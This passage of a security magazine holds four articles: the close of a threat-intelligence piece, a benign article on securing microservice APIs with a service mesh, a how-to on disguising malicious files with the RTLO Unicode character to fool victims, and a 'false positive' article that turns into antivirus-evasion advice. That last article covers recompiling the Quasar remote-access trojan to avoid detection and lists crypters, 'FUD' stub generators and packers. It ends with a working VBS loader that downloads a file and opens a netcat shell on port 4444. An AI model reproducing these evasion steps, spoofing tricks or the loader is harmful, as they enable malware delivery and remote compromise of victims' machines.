intelligence not actionable? Was the delivery medium wrong? Did it take too long? These are just a few
examples of things that, while they can bruise the ego, can incrementally improve your intelligence reports and,
ultimately, your intelligence program.
There are two vital measurements I set as mandatory fields for feedback: relevance and impact. The great part
about this is it ties back to our other tenants of the EASY button. Your relevancy should be high if you are
answering the requirements set during the “Elicit Requirements” phase. These are the questions you need to
answer for your stakeholder and if you send something that isn’t relevant but you felt met the requirement, it is
time to readdress your requirements with your stakeholder. Impact is vital for “Strive for Impact.” Did the
information help the stakeholder DO or DECIDE something? If the intelligence did, you are on the right track. If
it didn’t, do a bit of analysis as to why. Maybe there was not enough context for the importance of the
information. Maybe the message was not clear. Use feedback as a gift to make the program better.
Conclusion
I hope this helps the producers and the consumers of intelligence. Used correctly, threat intelligence can
validate strategy bets for security, aid in the improvement of the security posture, and give impactful value to
stakeholders around the organization. I also hope this demystifies intelligence and highlights the need to be
proactive in security. In my philosophy, intelligence leads security. If you understand the threats your
organization faces and you have your organization’s context in mind, you can get ahead of the ever-changing
and never-ceasing threat.
20

API led digital transformation and security
More and more ﬁnancial services organizations (FSI) are making customer experience a part of key
performance indicators. This change leads to an increasing focus on delivering a more personalized service
rather than a cookie cutter approach led by the constant churn of new products.
Given the nature of their business, most FSI organizations have massive troves of data that can be tapped
using modern computing paradigms such as advanced data analytics, hyper cloud and artiﬁcial intelligence.
The insights learned can be used to provide a personalized seamless experience in a multi-channel
environment (e.g. mobile, web, connected devices, etc.).
21
Abhi Singh
Abhi is a Senior Manager at Deloitte's Cyber Risk practice. He
focuses on Cyber Security issues at large Financial Services
clients. He has over 17 years of information security
experience. His current focus areas include perimeterless
security architecture and leveraging blockchain for security use
cases.
The network by virtue implements least privilege without relying on developers for it.
This can be a manageability and scalability headache. One method to implement
these capabilities is to use “Service Mesh”. This mesh will determine how each
service discovers each other (discovery) and talk to each other (routing). This was
previously done using load balancers in front of each service. Following this logic,
most of these load balancers are manually managed and if you were to add a new
service, you would open a change ticket that would be serviced by IT. Load
balancers introduce a cost penalty and an agility penalty based on how fast an
organization turns around the tickets, thereby defeating the overall purpose of
rapidly scaling using microservices.

An application programming interface (API) based model is the most logical choice for this transformation. APIs
make it easier to integrate and connect people, places, systems, data, things, and algorithms, create new user
experiences, share data and information, authenticate people and things, enable transactions and algorithms,
leverage third-party algorithms, and create new products/services and business models.
However, with this rapidly scalable and interlinked environment, security often takes a back seat in comparison
to business agility. Our attempt in this paper is to describe a few security paradigms that can be included as a
part of the core API based architecture to allow for agility and scalability.
Understanding the core architecture
One of the foundational elements of the API based architecture is loose interlinkages between different
applications or parts within the application. This coupling provides extensibility, reliability, and scalability.
An application can be thought of as a Lego kit that is built from several individual pieces (microservices) [1]
serving a specific role and, when assembled in a definite manner (interfaces), form a defined structure.
Here is a typical architecture pattern for accessing a bank account:
Fig 1. Simplified microservices based financial application high level architecture
In this (simplified) example, the user can query his information, such as bank balance, using an app developed
by the bank, or via a finances aggregator app developed by a 3rd party, or via a normal web interface. In each
case, the customer-facing micro-service will render the correct UI based on the access and populates the data
with the help of an aggregator service.
22

The aggregator service (is supposed to) understands the data elements needed to satisfy the user query and
needs to connect to a data repository or a storage microservice to fulfill.
Each of these microservices are independent of each other and interact using well defined interfaces[2]. This
loose coupling allows many benefits such as on-demand scaling of any microservice, for example, based on
the number of users accessing their account the UI microservice can scale up or down with demand without
impacting the others. Other advantages include predictable response due to well defined interface, lower
computing overhead, faster time-to-market due to rapid releases, localized testing requirements, lower
operational margins, effective resource utilization by focusing resources on microservices rather than the entire
application, amongst many others.
This architecture is usually implemented using containers such as Docker[4]. To achieve the basic tenets -
automated application deployment, scaling, and management - these containers are managed using container
orchestration systems like k8s[4] and docker swarm[5].
Given our focus on securing the above architecture, we will not go into details of these orchestration systems.
However, the footnotes provide an authoritative background on most commonly used systems.
Key security issues in this container driven agile environment
Disregarding (for simplicity) the issues that manifest in a multi-cloud scenario, the traditional security layered
defense doesn’t work in this case. Here are some reasons (not an exhaustive list):
• External facing APIs present a great misuse target[6] as they can expose application logic and potentially
sensitive data.
• Each microservice might have a small attack surface but the combined attack surface of the overall system is
hard to understand and defend.
• If each team can choose the language and frameworks for their microservice, it becomes extremely hard to
manage the security risks in a standardized manner.
• There is no choke point in the flow or network so logging, debugging, and access management becomes
tricky.
• There is an implicit trust on underlying hosts (or SaaS services in case of public cloud) to be secure and
provide segmentation based on risks posed by each container.
• In many cases these container hosts are dynamically created so enforcing the security measures to protect
the container runtime can be a challenge.
• Given the seamless flow of information between the containers, there is a strong possibility of lateral
movement if one of the containers is compromised. This issue can also lead to container/microservice
hopping following the predictable pattern of application flow[7].
23

• Monitoring is a challenge as the environment changes dynamically making it harder to correlate the data.
• Often microservices are made up of upstream proprietary and open source components. This can introduce
downstream vulnerabilities[8].
• Managing encryption keys or shared secrets leveraged by a container is a challenge because of the lack of
secure methods in deploying identifying keys in microservices. The encryption keys or secrets might also be
hard coded into container images.
• Integrating identity and access management can be an issue as there are multiple authentication and
authorization mechanisms present in a company and not all of them may be compatible with the container.
• As the application becomes fragmented and communication is purely API based, the developers have less
visibility into overall flow or business logic. This can lead to accidental exposure of information.
The (castle-wall based) tools currently available might not be fully capable of handling the new challenges
mentioned above. There aren’t many firewalls that observe east-west flows within the data center and
managing access control lists in a dynamically changing environment is almost impossible.
Integrating security in the life cycle
The basic tenet of the challenges mentioned above is the breach of trust using something that we inherently
trust such as a workload running on a container[9]. This is the same as what we have in a traditional data
center-based infrastructure, like a breach using a server running on an internal network.
To create a fundamentally secure infrastructure, we probably should not place any inherent trust on the network
leading to each system/container/pod becoming an island.
Fig 2. Breach is essentially localized
24

However, to achieve this architecture, the following key capabilities are required:
Every flow on this network is known - Applications have capability to engage in TLS based sessions.
Every flow is authenticated and authorized - Access control list, encryption keys, and credentials need to be
managed between microservices all while services are being added or changed.
The network by virtue implements least privilege without relying on developers for it. This can be a
manageability and scalability headache.
One method to implement these capabilities is to use “Service Mesh”[10]. This mesh will determine how each
service discovers each other (discovery) and talk to each other (routing). This was previously done using load
balancers in front of each service. Following this logic, most of these load balancers are manually managed and
if you were to add a new service, you would open a change ticket that would be serviced by IT. Load balancers
introduce a cost penalty and an agility penalty based on how fast an organization turns around the tickets,
thereby defeating the overall purpose of rapidly scaling using microservices.
So, with “Service Mesh”:
All service-to-service communications happen via Service Mesh (implemented as a software component,
proxy, placed adjacent to each microservice).
There is a central registry that is dynamically managed as the service instances come online and offline. So
new workloads can query this central registry to find the IP addresses of the services that they want to
connect to.
There is native support for some network functions such as resiliency, service discovery, etc.
Application developers can focus on the business logic while network and security functions can be
offloaded to the service mesh.
Circuit breaking can be achieved as a native feature.
The capabilities are language agnostic.
Security controls (encryption, authentication, authorization) can be implemented, managed, and scaled
dynamically without actually modifying the application.
In order to enforce these security requirements and decisions, the proxy needs access to workload (container)
identity. These identities need to be created, rotated, and managed as the workloads change.
The second tenet is repository authorizations maintained for each service. At a high level, the architecture
would look similar to:
25

Fig 3. High level design for enforcing security using a service mesh architecture
A policy server can be used to define identities using digital certificates and has the keys to sign and validate
these identities. The agents manage the certificate lifecycle and distribution of the correct certificates to the
right proxies.
Fig 4. Service-Mesh based flow
Advantages of the service mesh based design
Authentication becomes seamless, automated, and scalable
• In this decoupled design, the application can continue to function if there is an outage in the control plane
• Agents are only needed when the proxy boots or when the identity expires
26

• Because agents manage the identities (keys) automatically, the lifetime can be pretty short (e.g. 12 hours)
• There is no need to maintain keys in the enforcement plane, thereby reducing the attack surface
• Policy agents issue the identities to the service proxies, which in turn can use these identities to perform
communication over TLS using mutual authentication. The application does not need any changes in this
case
Authorization can be enforced to minimize the attack surface
• The engine contains fine grained application level policies that can describe the type of requests (e.g. GET,
service accounts that are allowed access) accepted at the service (workload) level. So even though the proxy
has the required identity, the request can still be deemed unauthorized if it’s not explicitly allowed in policy
server and enforced using enforcement agents. Depending on the capability of the proxy to understand the
details of protocols, you can enforce different match criteria
• The enforcement agent is only needed when the policy changes, otherwise, it is decoupled from the proxy
• When the proxy gets the access request it performs the following steps:
Authenticates the request
Captures the details of the access requested
Matches the request against the authorization policy as dictated by the enforcement agent
Allows or denies the request
Other benefits
• Proxy can be used to collect and forward logs to a central (SIEM type) service. It can also integrate with other
messaging systems[11].
• As proxy intercepts all the traffic close to workload, it is possible to identify accidental or intended data leaks.
• Compliance requirements of each type of workload can be defined in the policy server based on the data
type, location, etc. Agents can calculate the proxy specific compliance requirements. The proxies can be
used to enforce it on a request by request basis.
Beyond infrastructure - Further reducing the attack surface
The above approach will reduce the attack surface exposed due to infrastructure elements. However, the APIs
themselves may provide a viable breach target (though the impact might be localized and limited).
Below are some strategies to mitigate the attack surface exposed by APIs[12].
27

1. Making security an integral part of the continuous delivery pipeline: At a high level, the flow along with
security components looks like below. Note this is just a representation check the footnotes for more
definitive sources in this area[13].
Fig 5. Security in CI/CD pipeline
2. Focusing on compliance as a product: DevOps Audit Defense Toolkit[14] summarizes the techniques that
can be used to demonstrate to auditors that the company understands the business risks and are properly
mitigating those risks. The compliance requirements are automated in the CI/CD pipeline tools. The change
management is also automated and every change in the code is tied back to an approved ticket. This
enforces traceability and auditability.
3. Security of infrastructure code: The practices mentioned in DevOps Audit Defense Toolkit are applicable in
this area as well. Configuration management and automation tools like Ansible, Chef, Puppet can be used to
support the automated testing. Peer reviews are conducted before commits. All changes are logged and
analyzed.
Leveraging provable security methods
Provable security[15] (or model based validation) in our context means using formal methods to test and
demonstrate the security of the design. We start with threat modeling (albeit not considering side channel
attacks) and determine the coverage provided by the controls as the attack manifests.
The above mentioned design is based on the two high level set of policies:
Identification / authentication / access control lists, and;
28

Authorization
The objective here would be to develop an automated system that would validate the security of the design by
comparing it against the defined benchmarks (or set of fundamental rules that we have defined for the
particular environment). For example, a benchmark can be that the production systems should only be
accessible via a jump host or the user ids that have access to the systems’ changes based on the time of the
day (such as on-call roaster).
As in traditional design, we can leverage a threat modeling[16] to determine the potential vulnerabilities (and
hopefully the associated attack trees). Once we understand these vulnerabilities, we can determine the
corresponding rules that can be enforced using the policies described on Policy Server.
These policies describe the expected state (benchmark policies) of the environment that should be enforced by
agents through proxies.
During the day to day operations, the system admins, application owners, and others will define new policies.
Before the new policies can be implemented, they can be compared automatically (part of CI/CD pipeline) with
the pre-defined benchmarks. So the flow might look like:
Fig 6. Embedding provable security in CI/CD flow
The advantage of this process is that it is completely transparent to the developers or infrastructure engineers.
When a change to the existing environment is pushed (for example, a new app version that requires
modifications to the existing access or authorization policies), the change is automatically routed to the analysis
engine. The engine then compares it against the benchmarks and highlights the policy areas that violate the
required security thresholds.
29

As the analysis is done at the policy element level, the output/remediation also contains the exact elements that
need to be modified to meet the required criteria.
In addition, the CI/CD pipeline can be configured to check the policy changes against the baseline before filing
a change ticket.
References:
[1] https://doi.ieeecomputersociety.org/10.1109/MS.2018.2141039
[2] https://en.wikipedia.org/wiki/Application_programming_interface
[3] https://en.wikipedia.org/wiki/Docker_(software)
[4] https://github.com/kubernetes/kubernetes
[5] https://docs.docker.com/engine/swarm/
[6] https://www.owasp.org/index.php/OWASP_API_Security_Project
[7] https://dl.acm.org/citation.cfm?id=3274720
[8] https://github.com/devsecops/devsecops
[9] https://ai.google/research/pubs/pub43231
[10] https://www.nginx.com/blog/what-is-a-service-mesh/
[11] https://kafka.apache.org/
[12] https://www.owasp.org/index.php/OWASP_API_Security_Project
[13] https://www.devsecops.org/, https://www.devsecopsdays.com/
[14] https://itrevolution.com/devops-audit-defense-toolkit/
[15] https://en.wikipedia.org/wiki/Provable_security
[16] https://insights.sei.cmu.edu/sei_blog/2018/12/threat-modeling-12-available-methods.html
30

What is RTLO?
The word RTLO stands for RIGHT TO LEFT OVERRIDE is a Unicode mainly used for the writing and the reading
of Arabic or Hebrew text. Unicode has a special character, U+202e that tells computers to display the text that
follows it in right-to-left order, A Unicode character that will reverse the order of the characters that follow it.
RTLO has been used for phishing attacks for many years, where attackers insert the RTLO character in the
filenames of attachments and try to trick users into thinking the attachment is safe.
For example, a file named “malwaregpj.exe” will appear as “malwareexe.jpg”, which is an executable file with a
U+202e placed just before “exe.”
31
Pal Patel is a Security Researcher, Penetration Tester, and Bug Bounty
Hunter with over 3 years of experience. Pal has been awarded by more than
250+ companies for finding the loopholes in their systems.
Pal Patel
The word RTLO stands for RIGHT TO LEFT OVERRIDE is a Unicode mainly used for
the writing and the reading of Arabic or Hebrew text. Unicode has a special
character, U+202e that tells computers to display the text that follows it in right-to-
left order, A Unicode character that will reverse the order of the characters that
follow it. RTLO has been used for phishing attacks for many years, where attackers
insert the RTLO character in the filenames of attachments and try to trick users into
thinking the attachment is safe.

The RTLO character can be found from Character Map:
How do you Trick a victim using the RTLO technique?
This trick can be normally used in the chat functionality when you are chatting with a victim.
For example:
“Hey check out my new song at example.com/song[rtlo]3pm.exe.”
32

Replace the RTLO word from URL and put RTLO symbol from the character map and send the URL to the
victim. When the victim receives the URL its looks like:
“Hey check out my new song at example.com/songexe.mp3.”
When the Victim sees mp3, at least he/she thinks it’s a song so he/she clicks on the link. As soon as they click
on the link, RTLO gets trigged and it shows you:
http://example.com/song%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE
%E2%80%AE3pm.exe
33

It can trick the victim in the same way and also different social engineering techniques are used to trick the
victim using RTLO. Twitter, Skype, Snapchat, etc., have protection against the RTLO technique in chat
functionality.
This technique is a bit old, but it’s still being used for placing malware, backdoors, etc.
Let’s take another example:
• There is a malicious file named doc.exe
• Copy the RTLO character from the Character Map
• Enter the extension that you want in reverse, for example, if we want "doc", we need to write "cod", or if we
want "pdf", then we need to write "fdp"
• The real name of the file is: "doc[RTLO]fdp.exe"
• Paste the RTLO symbol
• After the file would be docexe.pdf. A victim can be tricked using the file extension
• A good idea would be to change the icon of the malicious file and also use a name that can trick the user, like
a malicious file disguised as a Microsoft Word file, with a tricky name in order to preserve the original
extension and fool the user
Conclusion
Hackers use every trick in the book to disguise their malicious files. Read more about phishing techniques and
ways to protect yourself. These tricks are very easy to implement and effective. We should be vigilant for every
URL or file that we download or open. As they say, the devil lies in the details.
BE SAFE, BE SECURE!!
References:
https://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html
https://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/
34

Basic information
In this article, we are going to talk about how to evade antivirus protection and how it can be hard for
developers who create legitimate software and techniques on antivirus evasion. I strongly recommend that you
use this information for white-hat purposes only, otherwise, you can get in trouble. We will talk about all types
of things that can help a developer avoid false positives in development of their software. Everybody who is
facing this problem should know all the basic things and tools that can help handle this type of problem.
35
Many antiviruses are designed to function analogous to the immune system of a
human being. They operate by scanning the computers for available signatures
corresponding to the binary pathogens and infections. The antivirus refers to a
dictionary of the known viruses, and if any detail obtained within the ﬁle resembles
the pattern in the dictionary, then the antivirus neutralizes it. Analogous to the
human immune system, the content of the dictionary requires updates like the ﬂu
shots to provide considerate protection against emerging strains of viruses. Any
antivirus counteracts to what it deems as harmful. The problem arises concerning
the creation of new strains of viruses at a rapid rate at which the antivirus
developers may not keep pace.
Ethical hacker with 12 years of experience. Worked in
CQR company in Ukraine. Geek, IT security addict. His
nickname is VULNZ.
Bohdan Ethics

False positive EXE.cuted. False positive problems on legitimate software
This research is made for developers who face false positive results on their software.
Signature detection
Many antiviruses are designed to function analogous to the immune system of a human being. They operate by
scanning the computers for available signatures corresponding to the binary pathogens and infections. The
antivirus refers to a dictionary of the known viruses, and if any detail obtained within the file resembles the
pattern in the dictionary, then the antivirus neutralizes it. Analogous to the human immune system, the content
of the dictionary requires updates like the flu shots to provide considerate protection against emerging strains
of viruses. Any antivirus counteracts to what it deems as harmful. The problem arises concerning the creation
of new strains of viruses at a rapid rate at which the antivirus developers may not keep pace. Thus, the
computer becomes vulnerable during the period between the time of detection of the virus and the time the
dictionary update is released from antivirus dealers, the reason behind keeping the antivirus updated as much
as possible.
Scan engines Method
Most importantly, the antivirus’s core function is virus scan engine. The antivirus scans the information, and
when the virus is detected, the antivirus disinfects it. Mentioned below are different ways of virus scanning.
36

Main Basic Techniques
Size: the antivirus easily detects if the file is changed or infected. It is common for some viruses to append their
malicious codes at the terminal of the file. An antivirus, in this case, scans the file and then compares the before
and after sizes. When the computer user makes no changes, the antivirus suspects the presence of malicious
actions running on the computer.
Pattern matching: there is a distinct and unique signature corresponding to each virus. The signature is used by
the virus to infect files of computers and could be a few lines in an assembly language that overwrites the stack
pointer rather than jumping to the new line of code. The antivirus compares information with the virus’ unique
signature and presence of resemblance is a clear indication of an infection.
A heuristic process occurs when the information being scanned is dangerous without the user knowing whether
it contains a virus or not. The technique involves an analysis of the data and then comparing it the list of
hazardous actions. For instance, if the antivirus detects that software is attempting to open each EXE file and
infecting it by writing a replica of the original program into it, the antivirus recognizes the program and declares
it is a dangerous activity and thus sounds an alarm. Now the decision remains to the user whether to eliminate
the perilous virus or not.
The above methods have merits and demerits. If the antivirus utilizes the signature approach, it needs to
update it regularly. This should be done on a daily basis since at least 15 new viruses emerge every single day.
Thus, if the antivirus is left un-updated for many days, it may cause severe danger.
Other ways the antivirus works includes monitoring of incoming files and deleting any virus within the files,
placing suspect files in quarantine and updating the software produced by the developers to address emerging
infections. In this case, the software may be set such that it checks for updates at regular time intervals.
False positives
False positive is the process of false and positive identification of a computer virus. In false identification, the
antivirus identifies a good program as a virus. False positive is regarded as a demerit of virus identification
method. Small weaknesses of any virus identification method may result in false positives that are fatal as false
negatives.
For an ideal situation, the false positive rate tends to be zero or approximately close to zero. Any small rise in
the false positive rate is not desired.
37

Note: This is a good example of what percent of false positives occur. These are outdated statistics, but the
idea is clearly seen.
• Reasons for getting False Positives
There are particular procedures that give very sensitive scanning by determining the relationship between the
viruses and their signatures. This type of method has a drawback whereby it is impossible to detect new and
unknown viruses. However, generic methods can identify all kinds of viruses without necessarily using virus
signatures. The generic methods also have their drawbacks since they create false positives.
For instance, the heuristic can detect new and unknown viruses though they are prone to false positives. This is
because the method adopted by heuristics relies on probabilistic methods and is therefore not certain of an
infection.
For example, if a heuristic program identifies a file “open” prompt, followed by “file read” and “write” prompts,
and also identifies a string “Virus” within the program, then it can respond that the file is under attack from the
unidentified virus.
There are chances that a file infected by a virus may meet all the conditions that render it infected; this is what
results in false positives.
As mentioned, generic methods are the most susceptible to false positives.
38

False positives may result due to the complications that arise in determining the disparity between codes that
are good and bad. Making wrong decisions may result in a false positive or a false negative. The antivirus
functions to solely find signatures of viruses and not the whole of the virus program. It also looks for wildcard
signatures. The signatures that the antivirus finds may not necessarily be of virus codes only.
Since the conventional signature is redundant when handling polymorphic and metamorphic malware,
antiviruses with new technologies should incorporate heuristic approaches in dealing with such viruses. Such
methods are often faced with high rates of false positives.
• Solutions
1. All software should have the same basic information as a binary file: Description, Version, Product name,
Language, Company name. Many false positives are because the file does not have any information inside, so
it’s flagged as suspicious or unwanted.
2. We need to check if the file was flagged as a virus based on its md5; it is a very uncommon situation, but it
can accidently happen. Here is an example of how it can happen.
3. We need to pack exe in order to make it harder to unpack it.
In this case, we need to use a custom packet, but on the other hand, it is better to pack it using standard UPX
because creating a custom pack can cause new problems for antiviruses that will not be able to identify which
type of packer was used.
39

Antivirus programs trust commonly used packers and do not like custom packers or some kinds of antivirus
packers.
4. We have to avoid using hooks that write themselves or read from registry if we don’t need it. Here is a list of
suspicious registry calls that should be avoided:
call for: antivirus software, ﬁrewall, remote administration, keyboard layout, extension change, update enable/
disable, look/edit system journal.
5. We have to avoid using system ﬁles and services that work with remote administration or connections if we
do not develop network software.
Calling integrated software, like ftp, telnet, psexec, rdp or other, inside our binary can cause a false positive
because a lot of malicious software use an integrated ftp client as an example to steal and transfer data over
the internet. It is better to use system tools, not system software.
40

6. It is a good idea to create an MSI packer for installing and uninstalling software.
Here is an example of how to create MSI packages. It was also checked that antivirus programs trust more MSI
files because they are mostly used with good purpose and bypass behavioral analysis better.
example of terminal utility to pack exe to upx.
7. We can give the ability to check if compiled binary is flagged as malware using VirusTotal database right
away and give advice.
8. Can be useful to avoid reverse if someone who develops want to avoid reversing of his code - enable anti
VirtualBox/sandbox solutions with virtualenv detection.
9. Avoid community from creating malicious software. Talk to the community and make weekly research on
github and other websites in order to see if someone created malicious software. This will make antivirus
companies look deeper and maybe give more false positives. This happened with the Develstudio project.
Develstudio is a project created to create GUI or binary from php code. Based on research, this project almost
closed and lost a large number of followers because it was used for malware creating, not php2exe clean
projects creation. The algorithm can be as simple as this: find all similar projects on github, download them to
cloud and check all releases (binary) for viruses. To make it more complex - compile and check. This is not hard
41

if the community is not big. Here can be found wrappers for common viruses, so it will make it easier to work
with them, not only checking it on VirusTotal.
10. Better not to use common names of Windows core files as it was found that some antiviruses found
common names like “svhost.exe”, “system32.exe”, etc.
11. Better not to use names of commonly used software like “firefox.exe”, “chrome.exe”, etc. It was proven that
3-5% of antiviruses react on this type of names rechecking md5 of real products and their versions and this
binary.
12. One of the most important procedures on software development is approvement and it was checked that all
binary software that is not signed in or flagged on antivirus server as commonly used will be blocked by the
browser or Windows smart screen.
Here is an automated solution with a bat file that can be performed in order to sign up software. Here is a
commercial utility and project where you can buy a cert and software to sign up builds.
13. Do not put multiple exe files inside one. This type of activity is common for a Trojan horse virus, so it is
important to understand that archiving one binary inside other for some reasons can cause problems.
Note: This is example of exe joiner that was marked as malicious even without being so only because it is
commonly used to glue down some malicious software, so its algorithm is marked as malicious, too.
14. It was found that some binaries have a large number of ZEROs following each other. For antiviruses it could
be understood as problematic software because it creates specially unused area in memory or on a hard drive
in order to: bypass md5 check, bypass some behavioral analysis, bypass signature based analysis, so it is
important to make code where no lines of zeros can be found on hex editor.
15. It will be a great idea to allow users to read terms and conditions before they install software or run it. There
is no information confirmed about antiviruses that check for existence of terms and conditions.
42

16. Custom icons for binary files is one of reasons it may not be detected as malicious. As was explained
earlier, there are machine learning techniques that give information about “WHAT malware should look like” and
most of malware by itself does not have any icon, because their developer steals icons, which is detected by
antivirus as well, or don’t create one, leaving it standard.
17. Do not use special characters or big amount of white spaces or dots on name. It was checked many times
with different antiviruses that for purpose of defense from extension spoofing, names that violate certain rules
will be blocked and marked as malicious. It is easy to check creating clean exe with spoof name.
Here is software.
18. Files that download other files or source from internet and run it. This looks like a problem for some
antiviruses as long as they cannot control all processes, so if they may a mark, this action appears suspicious.
19. Files that download and run libraries can be flagged as dangerous because based on machine learning
some .dll files can be used in massive development of malicious software and you can be the one accidentally
using it. It is always better to use OS integrated software.
20. Try not to inject into a running process because, as was mentioned before, many antivirus solutions can see
hooks or injectors and mark them suspicious even if they do not do any harm.
Signature creation process:
Here is a good article where everything can be found about creating signatures for viruses for ClamAv. This
article was read and based on it we put some additional information above.
Solving problem:
It can be developed software that will detect if binary was compiled by compiler and help it to bypass all
problems step by step, or it can be integrated inside compiler (not sure it is a good idea based on size that will
be increased). All steps could be found above.
The idea is to make it easier for developers who want to distribute their software but constantly face problems
with false positives. This can be a different product but it can be put like “tools” that help developer with this
issue.
43

Note: Example of what an exe maker/wrapper can look like that can help to bypass false positives.
To summarize all information given before, here is what antivirus engineers answer on why false positive occur.
Some comments on why false positives run on their antivirus solutions:
Ryan Permeh, Cylance:
"The Cylance engine is not an antivirus engine. Unlike AV, it doesn’t have a bias toward letting everything run.
The technology doesn't assume a file is good until it’s evaluated. Our approach is to measure and decide on
each and every file individually, and if it doesn't fit into our model of good, it leans towards bad. Without a bunch
of data to base a decision on, and without any real patterns of goodness to identify it as such, the engine leaned
heavily on the structural bits that are odd and drew a line towards bad in this case. When we train models, we
train on hundreds of millions of good and hundreds of millions of bad files (samples). We look at several million
potential data points (features) in each file in general, a piece of code can become "bad" by doing things that
lean towards bad. But it can also lean towards bad by not doing things that lean towards good. So in the most
basic example provided (hello world in debug build). The sample was small. It didn't show any bad, but it didn't
show any good either; One function programs are almost always malware; Debug builds are statistically weird;
Using mingw rather than visual studio is statistically weird. The output binary is 'odd.'"
Hyrum Anderson, Endgame:
"Before Twitter caught ablaze with these “hello world” samples, our own internal research indicated that our and
other models were susceptible to these toy samples. Let’s explain why. Endgame’s machine learning malware
detection uses static features to determine before a customer executes a file whether it is likely malicious or
benign. The machine learning model is an imperfect summarization of tens of millions of malicious and benign
software on which the model was trained. As an imperfect model, it can obviously be wrong, but still extremely
44

useful in detecting never before seen malware, far more useful than approaches which rely on signatures for
already known malware families. For the case of our model and other machine learning models based on static
features, the model can be wrong in this case because, in the training dataset, the model has seen: lots of real
malware samples that are small unsigned binaries; lots of real malware samples where the entry point (.text)
section is small, like droppers unpacking stubs; lots of real malware samples that attempt to hide their imports
from static analysis by some method, so that their import table looks very small. On the contrary, there are very
few “useful” benign files that are small, certainly too few to contradict the above experience. It’s important to
note that machine learning is actually quite good for prevention and detection malware, both novel samples and
the more well known. Endgame was one of the only few to get NotPetya in VirusTotal, for example. That said, all
machine learning models have blind spots (false negatives) and they can mistakenly call things bad (false
positives). In fact, we’ve shown in our published research that for some machine learning models, these
vulnerabilities can be quite convenient to exploit... At Endgame, we employ a strategy of layered protections
that align with a large number of commonly seen attacker actions. Our MalwareScore engine (released
standalone in VirusTotal) represents only a single slice of that layered protection paradigm. The layers work in
concert to alert our customers of potential threats (reducing FNs), and working together to build a complete
story of a potential threat (reducing FPs). Fortunately, the samples highlighted on Twitter are interesting corner
cases, but are extremely esoteric for our customer base. Nevertheless, we continually are doing more research
to improve our detection ratio and reduce our false positive rate. This involves data gathering to increase our
model’s understanding of the universe of benign and malicious software as well as a huge amount of
experimentation effort to maximize our model’s performance. We put a great amount of attention on addressing
known false positives seen by our customers. As a result of these efforts, we regularly release models to our
customers and to VirusTotal. And, we continue to work with 3rd parties to validate our model’s performance on
real files.”
Dr. Sven Krasser, CrowdStrike:
"There are two important aspects to understand. First, the machine learning models for static file analysis we
use at CrowdStrike are optimized to detect malware, especially novel families that bypass signature-based
approaches, while avoiding interference with legitimate business applications. However, unusual and artificially
constructed files fitting into neither of these two categories are occasionally detected as well. For this reason,
we expose confidence values and allow customers to set their own thresholds. While in this instance our file
analysis engine was arguably too aggressive, generally this behavior is by design: if a file does not look like a
legitimately useful application while also exposing unusual traits, then the sound call is to prevent it from
executing. Avoiding odd looking yet potentially benign objects should be a familiar concept should you have
ever opened an office fridge before. Second, static file analysis alone (i.e. what most vendors provide on
VirusTotal) is simply not a sufficient security tool on its own. It is easy to create files that behave benignly yet are
detected by both signature and ML-based engines. It is, however, also possible to create malware files that
bypass detection. That is trivially possible for signature-based engines, but one can also bypass ML-based
static file analysis with some effort. Therefore, CrowdStrike Falcon uses static file analysis as only one of many
45

techniques to detect threats while combining it with several other layers of defense, such as advanced
Indicators of Attack."
Compilation from source
For the example of Quasar, you can take Visual Studio 2017 and build from source.
Previously, you can add to the code itself:
1) Commands or variables that do not aﬀect the process
2) Additional functions that do something
3) Delay the execution of something
4) Change the names of variables in the entire project
5) Obfuscate the code
6) Remove ﬁngerprints (name of shpz, author name)
https://github.com/quasar / QuasarRAT
> 1.exe head 1000 1.exe> / host / machine / with such a load, you can see on which bit of code
the antivirus swears.
Hex editor
46

https://mh-nexus.de/en/hxd/
https://www.x-ways.net/winhex/
https://www.wxhexeditor.org/
Debuggers
https://www.immunityinc.com / products / canvas / debugger
https://samsclass.info/127/proj/p8aim.htm article
https://exelab.ru/download.php?action=list&n=MTA=
Signature certiﬁcate
http://qaru.site/ questions / 54786 / signing-a-windows-exe-ﬁle guide - Windows in the standard way
https://www.connect-trojan.net/2016/06/aegis-crypter-8.5.html Aegis cryptor has this function
47

Installers and spx:
https://www.advancedinstaller.com/
https: //www.actualinstaller. com /
http://www.cyberforum.ru/cmd-bat/thread2022256.html sfx archive
Packers
48

UPX, ASPack, FSG, PeShield, VMProtect
https://github.com/EgeBalci/Amber
https://github.com/ Eronana / packer
http://www.webtoolmaster.com/packer.htm
https://www.boxedapp.com/
https://github.com/SerGreen/Appacker Very interesting packer, it can pack the entire folder
Protectors and anti-debuggingdebugging
Anti-
https : //github.com/bekdepo/cryptor you need to compile
https://github.com/Paskowsky/DreamProtectorFree GUI
https://exelab.ru/download.php?action=list&n=NDA= collection of protectors are still relevant
Cryptors
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20B inaries https://github.com/Ch0pin/AVIator
https://github.com/NYAN-x-CAT/Lime-Crypter
49

https://github.com/extremecoders-re/xor-files xor
https: // github .com / malwares / Crypter to compile a huge list
https://github.com/guilhermej/scantime_py_crypter easy to understand, you can change the key
Stub generators
https://www.youtube.com/watch?v=_Qx3UZAuo8o
https://www.mediafire.com/file/pazaz4pzwk27eow/%5BVIP%5DCrypter+v2f%2BUnique+Stub+Generator
+0.5.1+%5BFUD%5D%5BApril+2014%5D.rar
Loader / Dropper
A loader is a bootloader which by itself does not affect the system in any way, it is in the system for the
specified time and after it has completed downloading the payload is usually no longer used. An example
bootloader might be: vbs, js, hta, bat, ps1 and other files. Also, in Windows, there is built-in software such as
FTP, START (bat), using ps scripts or certutil can also download malware.
• Article on this subject:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers -to-download-malware-
while-bypassing-av /
• Example of a loader on vbs
dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject ("Microsoft.XMLHTTP")
set stream_obj = CreateObject ("ADODB.Stream")
set shell_obj = CreateObject ("WScript.Shell")
URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe"' Name to save the file (on the local system)
50

RUNCMD = "nc.exe - L -p 4444 -e cmd.exe "'Command to run after downloading
http_obj.open "GET", URL, False
http_obj.send
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
shell_obj.run RUNCMD
https://github.com/d4rkcat/cryptbinder
